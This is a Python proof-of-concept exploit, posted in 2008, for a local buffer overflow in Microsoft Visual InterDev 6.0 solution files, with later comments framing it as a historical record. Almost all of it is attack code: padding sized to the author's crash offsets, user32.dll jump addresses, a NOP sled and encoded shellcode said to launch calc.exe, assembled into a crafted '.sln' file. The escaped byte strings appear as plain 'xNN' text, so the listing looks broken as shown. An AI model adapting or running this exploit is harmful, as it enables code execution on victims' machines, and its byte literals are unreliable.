
mssln-overflow.txt

Posted on 11 January 2008

#usage: exploit.py FileName
# Historical proof-of-concept (posted 2008) for the Visual InterDev 6.0 ".sln"
# overflow described in the banner below. The script does one thing: it
# writes a single solution file, "<FileName>.sln", whose Project(...) line is
# padded with repeated "A" characters and a few fixed addresses. It performs
# no other action on the host.
# NOTE(review): the byte-string literals below are reproduced exactly as this
# page renders them (plain "xNN" text); the listing is kept as a record of
# what was published rather than as a maintained tool.
import sys
# Banner: the author's own notes on the crash path, printed verbatim.
print "------------------------------------------------------------------------"
print ' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org "
print " I really have much fun exploiting this one :)"
print " We need to patch five exceptions before we can have EIP: "
print " #7C80A268 8801 MOV BYTE PTR DS:[ECX],AL"
print " #ECX 42424242 <-- to patch with jumper 0x7E3FBEFF"
print "------------------------------------------------------------------------"
# Padding blocks. The sizes are the author's offsets for this particular
# crash (presumably found with a debugger, per the banner); they are fixed
# constants, not derived from anything at runtime.
buff = "A" * 1764
jumper = "xFFxBEx3Fx7E" #call ESP from user32.dll
buff2 = "A" * 4
buff3 = "A" * 24
buff4 = "A" * 16
buff5 = "A" * 4
nop = "x90x90x90x90"
# Payload string, as published (author's comment says it launches calc.exe;
# that is their claim, not something verified here).
shellcode = \
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+\
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+\
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+\
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+\
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"+\
"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47"+\
"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38"+\
"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48"+\
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"+\
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+\
"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58"+\
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44"+\
"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38"+\
"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33"+\
"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47"+\
"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a"+\
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b"+\
"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33"+\
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37"+\
"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59"+\
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56"+\
"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a" #execute calc.exe
buff6 = "A" * 8
get_EIP = "xFFxB9x3Fx7E" #call EBP from user32.dll
buff7 = "A" * 56
try:
    # Assemble the solution file. Only the two quoted fields of the
    # Project(...) line carry the padding; the rest is a minimal but
    # well-formed-looking .sln skeleton so the product will parse the file.
    # For defenders: a .sln whose Project(...) name field is roughly 1.8 KB of
    # one repeated character is a trivially recognisable artifact of this PoC,
    # and the product named in the banner is the only thing it targets.
    sln_file = \
    'Microsoft Visual Studio Solution File, Format Version 1.00 '+\
    'Project("{00000000-0000-0000-0000-000000000000}") = "CAB2", "' + buff + jumper + buff2 + jumper + buff3 + jumper + buff4 + jumper + buff5 + nop + shellcode + nop + '", "' + jumper + buff6 + get_EIP + buff7 + '" '+\
    'EndProject '+\
    'Global '+\
    ' GlobalSection(LocalDeployment) = postSolution '+\
    ' StartupProject = {00000000-0000-0000-0000-000000000000} '+\
    ' EndGlobalSection '+\
    ' GlobalSection(BuildOrder) = postSolution '+\
    ' 0 = {00000000-0000-0000-0000-000000000000} '+\
    ' EndGlobalSection '+\
    ' GlobalSection(DeploymentRoot) = postSolution '+\
    ' EndGlobalSection '+\
    'VersionCompanyName="xxx" '+\
    'EndGlobal'
    # Output path is taken from argv unchanged and opened in text mode.
    out_file = open(sys.argv[1] + ".sln",'w')
    out_file.write(sln_file)
    out_file.close()
    print " FILE CREATION COMPLETED! "
except:
    # Bare except: a missing argument (IndexError on sys.argv[1]) and an
    # unwritable path (IOError from open) are both collapsed into the same
    # generic usage message, so the real cause is never reported.
    print " -------------------------------------"
    print " Usage: exploit.py FileName"
    print " -------------------------------------"
    print " AN ERROR OCCURS DURING FILE CREATION!"

 
